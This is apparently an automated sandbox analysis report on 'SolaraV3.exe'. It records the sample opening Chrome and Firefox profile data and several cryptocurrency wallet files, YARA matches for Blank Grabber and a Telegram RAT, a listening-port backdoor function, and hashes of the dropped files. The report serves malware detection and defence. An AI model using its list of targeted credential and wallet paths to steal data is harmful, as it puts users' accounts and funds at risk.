Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Steals Internet Explorer cookies

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

File read: C:\Users\user\AppData\Local\Temp\ ?? ? \Credentials\Chrome\Chrome Cookies.txt

Yara detected Credential Stealer

Source: Yara match	File source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1563577276.000001EA23124000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1563577276.000001EA23122000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2034413215.000001FC25CB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SolaraV3.exe PID: 2884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 2_2_00007FFB0B812B62 bind,WSAGetLastError,

2_2_00007FFB0B812B62

Windows Analysis Report
SolaraV3.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1525849
Product:	CloudBasic
Start time:	15:30:51
Start date:	04.10.2024
Sample:	SolaraV3.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	7dd77a8611b56c1ed090293e3ab40f08
SHA1:	1cb4be6453ab5dbeebd8339e0ec4264d6efa611c
SHA256:	5d887dd72893e3bd40b291a1dc3ea2bc94f6d0daf4de318bd1005b57fbe114ca
Filetype:	Win64 Executable GUI (202006/5) 92.65%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Network\Downloader\edb.log	data	FA1B503F545AC5025616A4E336142738	F570917FC4767D0D3683EEA8244037842FB8F1D6	52B744629D22B44690AE331DDFD058E92C123E635A3B12B5A43B7CEE6F1F4C07
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage engine DataBase, version 0x620, checksum 0x261b5efc, page size 16384, DirtyShutdown, Windows version 10.0	B9F57D2C31850D0D42EE4D312280C220	AA5B3532DDAA89C1B0F89E8672B5918091B50DE5	3DDE8EEC3FC45997C7153B9927227AD9B21F5B757ACB5EDD227BA9D0D0E71703
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	034638717F142777A4950835FC2C2636	7BB0E571983F79651A8649AF8BE99994E296E7DC	86DBEA30CE3977965EBA207BABD5C3948373D8B8B45103205C601DE49DF42768
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Temp\ ?? ? \Display (1).png	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced	0B52B4809172F2B581D3D01E3111BA27	23F526684310861FB063F33B92F5937E3F0E42EF	338A581F7C28EDA4BC66F4C627C3C399BE98D6D048AF89A9E0EA4C2BCB61E380
C:\Users\user\AppData\Local\Temp\MpCmdRun.log	Unicode text, UTF-16, little-endian text, with CRLF line terminators	8CD82B477D6BFB3E2E42326E9B64A327	A9CAF90BD019B95A93FEABD63A8BDC4EEDA20A3C	D88A12EEF3C7EA6F2C1045998D4BEEB6381CD8A6C8AF25E85FA356676139C010
C:\Users\user\AppData\Local\Temp\RESF203.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4c2, 9 symbols, created Fri Oct 4 15:28:40 2024, 1st section name ".debug$S"	B58032395A006D21A4AD1E696312D974	BBE08899A0EF06C6D3C1E26B890A3CAB7FCC16B2	352E3D1733644C6D50A9B60F713462FEF2D8D3D97D17AF67FC9EAB1BABDDE669
C:\Users\user\AppData\Local\Temp\_MEI28842\VCRUNTIME140.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	F34EB034AA4A9735218686590CBA2E8B	2BC20ACDCB201676B77A66FA7EC6B53FA2644713	9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	FBA120A94A072459011133DA3A989DB2	6568B3E9E993C7E993A699505339BBEBB5DB6FB0	055A93C8B127DC840AC40CA70D4B0246AC88C9CDE1EF99267BBE904086E0B7D3
C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	31859B9A99A29127C4236968B87DBCBB	29B4EE82AA026C10FE8A4F43B40CBD8EC7EA71E5	644712C3475BE7F02C2493D75E6A831372D01243ACA61AA8A1418F57E6D0B713
C:\Users\user\AppData\Local\Temp\_MEI28842\_decimal.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	7CDC590AC9B4FFA52C8223823B648E5C	C8D9233ACBFF981D96C27F188FCDE0E98CDCB27C	F281BD8219B4B0655E9C3A5516FE0B36E44C28B0AC9170028DD052CA234C357C
C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	659A5EFA39A45C204ADA71E1660A7226	1A347593FCA4F914CFC4231DC5F163AE6F6E9CE0	B16C0CC3BAA67246D8F44138C6105D66538E54D0AFB999F446CAE58AC83EF078
C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	864B22495372FA4D8B18E1C535962AE2	8CFAEE73B7690B9731303199E3ED187B1C046A85	FC57BD20B6B128AFA5FAAAC1FD0CE783031FAAF39F71B58C9CACF87A16F3325F
C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	BEBC7743E8AF7A812908FCB4CDD39168	00E9056E76C3F9B2A9BABA683EAA52ECFA367EDB	CC275B2B053410C6391339149BAF5B58DF121A915D18B889F184BE02BEDAF9BC
C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	49F87AEC74FEA76792972022F6715C4D	ED1402BB0C80B36956EC9BAF750B96C7593911BD	5D8C8186DF42633679D6236C1FEBF93DB26405C1706F9B5D767FEAB440EA38B0
C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	70A7050387359A0FAB75B042256B371F	5FFC6DFBADDB6829B1BFD478EFFB4917D42DFF85	E168A1E229F57248253EAD19F60802B25DC0DBC717C9776E157B8878D2CA4F3D
C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	9A7AB96204E505C760921B98E259A572	39226C222D3C439A03EAC8F72B527A7704124A87	CAE09BBBB12AA339FD9226698E7C7F003A26A95390C7DC3A2D71A1E540508644
C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip	Zip archive data, at least v2.0 to extract, compression method=store	483D9675EF53A13327E7DFC7D09F23FE	2378F1DB6292CD8DC4AD95763A42AD49AEB11337	70C28EC0770EDEFCEF46FA27AAA08BA8DC22A31ACD6F84CB0B99257DCA1B629E
C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes	Zip archive data, at least v2.0 to extract, compression method=store	2FCDAE27E8550D5159993C37A1A3ADD8	D3EAC11B04BA62043E94D637B830AF21009FD309	7BCAE0D278321E777290953351C27571CC2272D563C5CEA6D34EBB0786ED10CE
C:\Users\user\AppData\Local\Temp\_MEI28842\libcrypto-1_1.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	BBC1FCB5792F226C82E3E958948CB3C3	4D25857BCF0651D90725D4FB8DB03CCADA6540C3	9A36E09F111687E6B450937BB9C8AEDE7C37D598B1CCCC1293EED2342D11CF47
C:\Users\user\AppData\Local\Temp\_MEI28842\libffi-7.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	6F818913FAFE8E4DF7FEDC46131F201F	BBB7BA3EDBD4783F7F973D97B0B568CC69CADAC5	3F94EE4F23F6C7702AB0CC12995A6457BF22183FA828C30CC12288ADF153AE56
C:\Users\user\AppData\Local\Temp\_MEI28842\libssl-1_1.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	AD0A2B4286A43A0EF05F452667E656DB	A8835CA75768B5756AA2445CA33B16E18CEACB77	2AF3D965863018C66C2A9A2D66072FE3657BBD0B900473B9BBDCAC8091686AE1
C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	4A6AFA2200B1918C413D511C5A3C041C	39CA3C2B669ADAC07D4A5EB1B3B79256CFE0C3B3	BEC187F608507B57CF0475971BA646B8AB42288AF8FDCF78BCE25F1D8C84B1DA
C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	PE32+ executable (console) x86-64, for MS Windows	9C223575AE5B9544BC3D69AC6364F75E	8A1CB5EE02C742E937FEBC57609AC312247BA386	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key	ASCII text	4531984CAD7DACF24C086830068C4ABE	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	B6DE7C98E66BDE6ECFFBF0A1397A6B90	63823EF106E8FD9EA69AF01D8FE474230596C882	84B2119ED6C33DFBDF29785292A529AABBF75139D163CFBCC99805623BB3863C
C:\Users\user\AppData\Local\Temp\_MEI28842\sqlite3.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	0C4996047B6EFDA770B03F8F231E39B8	DFFCABCD4E950CC8EE94C313F1A59E3021A0AD48	983F31BC687E0537D6028A9A65F4825CC560BBF3CB3EB0D3C0FCC2238219B5ED
C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	C697DC94BDF07A57D84C7C3AA96A2991	641106ACD3F51E6DB1D51AA2E4D4E79CF71DC1AB	58605600FDAAFBC0052A4C1EB92F68005307554CF5AD04C226C320A1C14F789E
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0umvczke.yjq.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21u3tjdl.isn.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2anuzdex.hfv.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nx5tlhe.uy0.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_45y04qvf.dom.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5pqqnxlf.mfu.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h33ja5af.4yp.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hp54fb1q.2gs.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o10m2tcb.yza.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odi1wr22.l0h.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prybmjqg.2sy.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qguj5uuh.d2k.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qhwlnnpk.ucj.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
